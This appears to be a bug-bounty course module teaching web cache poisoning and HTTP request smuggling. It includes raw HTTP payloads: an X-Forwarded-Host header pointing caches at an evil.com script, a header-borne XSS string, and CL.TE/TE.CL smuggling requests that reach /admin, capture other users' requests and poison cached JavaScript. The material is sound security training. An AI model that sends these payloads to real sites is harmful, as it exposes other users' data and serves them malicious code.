Advanced Exploitation Techniques
Web Cache Poisoning & Request Smuggling
3 min read
These advanced techniques exploit infrastructure layers between clients and servers. They're complex but yield top-tier bounties.
Web Cache Poisoning
Trick caches into storing malicious responses:
1. Attacker sends: Request with poisoned header
2. Server responds: Based on poisoned input
3. Cache stores: Malicious response
4. Victim requests: Same URL
5. Cache serves: Poisoned response to victim
Cache Keys vs Unkeyed Inputs
Cache Key (what identifies cached content):
- URL path
- Query parameters
- Host header
Unkeyed Inputs (ignored by cache, processed by app):
- X-Forwarded-Host
- X-Original-URL
- X-Forwarded-Scheme
Basic Cache Poisoning
# Test unkeyed headers
GET / HTTP/1.1
Host: example.com
X-Forwarded-Host: evil.com
# If response contains: <script src="//evil.com/app.js">
# And response is cached → ALL visitors get poisoned page
Finding Unkeyed Headers
# Headers to test
X-Forwarded-Host
X-Forwarded-Scheme
X-Original-URL
X-Rewrite-URL
X-Forwarded-For
X-Host
X-Forwarded-Server
# Use Param Miner (Burp extension)
# Automatically discovers unkeyed parameters
Cache Poisoning to XSS
# Scenario: X-Forwarded-Host reflected in page
GET /page HTTP/1.1
Host: example.com
X-Forwarded-Host: "><script>alert(1)</script>
# If cached, XSS affects all users
Targeted Cache Poisoning
# Poison specific user's cache (via Vary header)
# If Vary: User-Agent
# Poison cache for specific User-Agent string
# Send phishing link with that User-Agent
HTTP Request Smuggling
Exploit discrepancies in how front-end and back-end interpret requests.
Why It Works
Client → Front-end (CDN/WAF/Load Balancer) → Back-end Server
Front-end uses: Content-Length
Back-end uses: Transfer-Encoding: chunked
Request boundaries interpreted differently!
CL.TE Smuggling
Front-end: Content-Length Back-end: Transfer-Encoding
POST / HTTP/1.1
Host: example.com
Content-Length: 13
Transfer-Encoding: chunked
0
SMUGGLED
TE.CL Smuggling
Front-end: Transfer-Encoding Back-end: Content-Length
POST / HTTP/1.1
Host: example.com
Content-Length: 3
Transfer-Encoding: chunked
8
SMUGGLED
0
Detection
# Time-based detection
# If back-end waits for more data → vulnerable
# CL.TE detection
POST / HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Content-Length: 4
1
Z
Q
# If timeout → CL.TE possible
Exploitation Scenarios
Bypass Access Controls
# Smuggle request to restricted endpoint
POST / HTTP/1.1
Host: example.com
Content-Length: 100
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: localhost
Steal User Requests
# Prefix next user's request with attacker's data
POST / HTTP/1.1
Content-Length: 200
Transfer-Encoding: chunked
0
POST /comment HTTP/1.1
Content-Length: 500
comment=
# Next user's request appended as comment body!
Cache Poisoning via Smuggling
# Smuggle request that gets cached
POST / HTTP/1.1
Content-Length: 100
Transfer-Encoding: chunked
0
GET /static/app.js HTTP/1.1
Host: example.com
X-Forwarded-Host: evil.com
Tools
# smuggler - automated detection
python3 smuggler.py -u https://example.com
# Burp Suite - HTTP Request Smuggler extension
# Automatically detects and generates smuggling payloads
Bounty Examples
| Company | Technique | Bounty |
|---|---|---|
| PayPal | Cache poisoning | $15,000 |
| Cloudflare | Request smuggling | $20,000 |
| Uber | Cache poisoning XSS | $8,000 |
| DoD | Smuggling bypass | $10,000 |
Testing Tips
- Cache poisoning: Test all headers, use Param Miner
- Request smuggling: Time-based detection first
- Always test safely: These bugs affect other users
- Document thoroughly: Complex bugs need clear PoC
Pro Tip: These are James Kettle (albinowax) specialties. Read his research for cutting-edge techniques.
Next module: API and mobile security testing. :::